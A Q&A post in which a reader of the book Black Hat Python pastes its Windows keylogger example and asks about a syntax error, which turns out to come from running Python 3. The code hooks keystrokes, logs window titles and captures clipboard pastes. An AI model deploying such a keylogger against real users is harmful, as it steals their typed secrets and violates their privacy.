# Errors with book examples

Tags: python, keylogger

I am currently reading Black Hat Python by Justin Seitz and have been running into issues with the code provided. I am using python version 2.7 as the book suggested.

I downloaded the example files straight from the website and imported them into wing IDE to verify if my problem is due to my own error or an error with the book or program. BTW I am using windows to write this and not linux as the chapter states this is windows specific.

```
enter code here
from ctypes import *
import pythoncom
import pyHook 
import win32clipboard

user32   = windll.user32
kernel32 = windll.kernel32
psapi    = windll.psapi
current_window = None

def get_current_process():

    # get a handle to the foreground window
    hwnd = user32.GetForegroundWindow()

    # find the process ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))

    # store the current process ID
    process_id = "%d" % pid.value

    # grab the executable
    executable = create_string_buffer("\x00" * 512)
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

    psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)

    # now read it's title
    window_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(window_title),512)

    # print out the header if we're in the right process
    print
    print "[ PID: %s - %s - %s ]" % (process_id, executable.value, 
window_title.value)
    print


    # close handles
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)

def KeyStroke(event):

    global current_window   

    # check to see if target changed windows
    if event.WindowName != current_window:
        current_window = event.WindowName        
        get_current_process()

    # if they pressed a standard key
    if event.Ascii > 32 and event.Ascii < 127:
        print chr(event.Ascii),
    else:
        # if [Ctrl-V], get the value on the clipboard
        # added by Dan Frisch 2014
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            print "[PASTE] - %s" % (pasted_value),
        else:
            print "[%s]" % event.Key,

    # pass execution to next hook registered 
    return True

# create and register a hook manager 
kl         = pyHook.HookManager()
kl.KeyDown = KeyStroke

# register the hook and execute forever
kl.HookKeyboard()
pythoncom.PumpMessages()
```

I am receiving errors such as;

Syntax Error: invalid syntax: C:\Users\Brand\Desktop\programming\BHP-Code\Chapter8\keylogger.py, line 35, pos 33
print "[ PID: %s - %s - %s ]"% (process_id, executable.value, window_title.value)

Comment: https://pythonclock.org/

Comment: Strange... when I run your code using Python 2.7, I don't get any syntax errors. But when I run your code using Python 3, I get the same error you describe. Are you 100% sure you're using Python 2.7? What output do you get if you execute a script containing `import sys; print(sys.version)`?

Comment: ok now I feel like an idiot. I ran the code and was given python 3 even though I set the interpreter to 2. I guess I will do some research and more practice with the IDE. Thank you for your help!

Comment: I figured out my problem. When telling wing IDE what version of python I want to use I edited the python path but not the executable.